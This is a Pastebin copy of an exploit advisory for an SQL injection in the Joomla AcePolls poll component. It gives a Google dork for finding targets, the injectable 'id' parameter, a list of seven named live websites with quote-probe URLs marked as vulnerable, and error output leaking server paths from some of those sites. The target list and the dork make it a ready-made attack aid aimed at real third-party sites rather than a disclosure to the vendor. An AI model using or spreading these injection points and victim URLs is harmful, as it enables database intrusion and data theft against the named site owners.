Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla AcePolls 3.x SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 10/02/2019
- # Vendor Homepage : joomace.net
- # Software Download Link : joomace.net/downloads/acepolls
- github.com/S-Karpenko/ecc/tree/master/administrator/components/com_acepolls
- # Software Information Link : plugintop.com/joomla-extension-acepolls/
- joomla-secrets.ru/nastrojka-joomla/178-sozdanie-oprosa-na-joomla-acepolls
- # Software Version : Joomla 1.5 - 2.5 and 3.x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_acepolls''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- AcePolls is a simple and flexible component for voting.
- It displays the vote results in 2 types, a nice pie chart or default Joomla way.
- AcePolls offers you a lot of options that makes it very flexible.
- You can add as much options as you want, choose different color for each option,
- re-order options as you want, set publish and unpublish dates
- for each poll, check votes per IP, cookies and user etc.
- ####################################################################
- # Impact :
- ***********
- Joomla AcePolls 3.x and other versions - component for Joomla is prone
- to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_acepolls&view=poll&id=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] logisticatotal.co/principal/index.php?option=com_acepolls&view=poll&id=3%27
- [+] turistago.com/index.php?option=com_acepolls&view=polls&Itemid=186%27
- [+] lib.aanet.ru/jirbis2/index.php?option=com_acepolls&view=poll&id=11%27
- [+] tecno-service.it/index.php?option=com_acepolls&view=poll&id=1%27
- [+] libr.itut.ru/jirbis2/index.php?option=com_acepolls&view=poll&id=1%27
- [+] sarminfo.ru/index.php?option=com_acepolls&view=poll&id=1%27
- [+] usppi.it/index.php?option=com_acepolls&view=poll&id=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Strict Standards: Only variables should be assigned by reference
- /web/htdocs/www.turistago.com/home/joomla/templates
- /turistagodef3/functions.php on line 593
- Warning: implode(): Invalid arguments passed in /web/htdocs
- /www.tecno-service.it/home/components/com_acepolls
- /views/poll/view.html.php on line 171
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement